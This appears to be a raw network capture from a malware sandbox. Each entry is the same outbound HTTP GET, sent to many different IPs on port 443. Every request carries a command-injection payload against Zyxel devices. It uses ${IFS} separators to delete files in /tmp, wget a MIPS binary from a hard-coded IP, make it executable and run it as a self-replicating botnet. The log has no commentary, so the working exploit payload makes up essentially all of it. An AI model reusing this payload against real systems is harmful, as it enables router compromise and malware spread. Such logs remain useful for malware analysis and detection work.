                                      Jan 19, 2024 17:29:24.613377094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2446192.168.2.145930445.94.27.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613437891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2447192.168.2.1448252112.136.218.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613476992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2448192.168.2.1454406171.147.167.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613519907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2449192.168.2.143761661.37.88.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613523960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2450192.168.2.143943231.7.138.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613579035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2451192.168.2.144206637.61.171.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613631010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2452192.168.2.1445368109.1.60.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613651037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2453192.168.2.1440222167.164.68.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613683939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2454192.168.2.1452034179.205.19.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613735914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2455192.168.2.1458970199.197.21.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613775015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2456192.168.2.143744444.251.107.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613817930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2457192.168.2.1438608150.195.159.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613851070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2458192.168.2.14501805.148.211.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613879919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2459192.168.2.1439458160.90.197.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613929987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2460192.168.2.144019883.252.223.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613974094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2461192.168.2.1441756139.166.79.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614001036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2462192.168.2.1443990179.20.96.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614054918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2463192.168.2.1458834135.216.62.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614082098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2464192.168.2.1454258135.202.250.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614125013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2465192.168.2.1438584119.67.132.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614167929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2466192.168.2.144183439.140.115.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614209890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2467192.168.2.146009812.22.166.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614255905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2468192.168.2.1450678112.230.240.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614291906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2469192.168.2.144827839.147.241.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614361048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2470192.168.2.145880638.46.191.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614370108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2471192.168.2.1443088181.179.241.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614389896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2472192.168.2.145813878.75.29.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614450932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2473192.168.2.1437904223.26.172.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614486933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2474192.168.2.145056642.64.218.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614526033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2475192.168.2.145839849.201.203.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614543915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2476192.168.2.1433660208.217.59.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614589930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2477192.168.2.1454896111.222.127.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614633083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2478192.168.2.145575298.33.132.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614672899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2479192.168.2.145938444.236.47.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614706993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2480192.168.2.143951446.39.128.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614729881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2481192.168.2.1449562119.182.219.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614765882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2482192.168.2.143639469.207.49.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614801884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2483192.168.2.14580649.57.252.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614836931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2484192.168.2.1460890135.107.211.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614897013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2485192.168.2.1444432221.45.138.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614919901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2486192.168.2.144815086.107.173.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.614964962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2487192.168.2.145352831.43.206.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615020037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2488192.168.2.1446408167.167.161.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615050077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2489192.168.2.144585071.78.98.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615086079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2490192.168.2.1441398102.85.230.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615103960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2491192.168.2.1457916186.128.15.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615133047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2492192.168.2.145468436.207.210.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615149975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2493192.168.2.143981696.134.24.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615206003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2494192.168.2.1437776111.85.131.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615231037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2495192.168.2.1454944108.160.199.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615274906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2496192.168.2.145885495.141.147.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615328074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2497192.168.2.145315483.131.149.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615351915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2498192.168.2.145956643.162.58.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615384102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2499192.168.2.144623874.196.60.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615437031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2500192.168.2.145350434.59.112.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615487099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2501192.168.2.1436234204.60.137.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615504980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2502192.168.2.1436660160.8.49.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615556955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2503192.168.2.1460530193.89.234.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615609884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2504192.168.2.1443876157.212.86.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615653992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2505192.168.2.1433264207.109.93.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615684986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2506192.168.2.1434716202.224.228.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615710020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2507192.168.2.145962438.75.106.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615747929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2508192.168.2.14528581.249.67.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615796089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2509192.168.2.1450882160.86.205.199443
                                      TimestampBytes transferredDirectionData
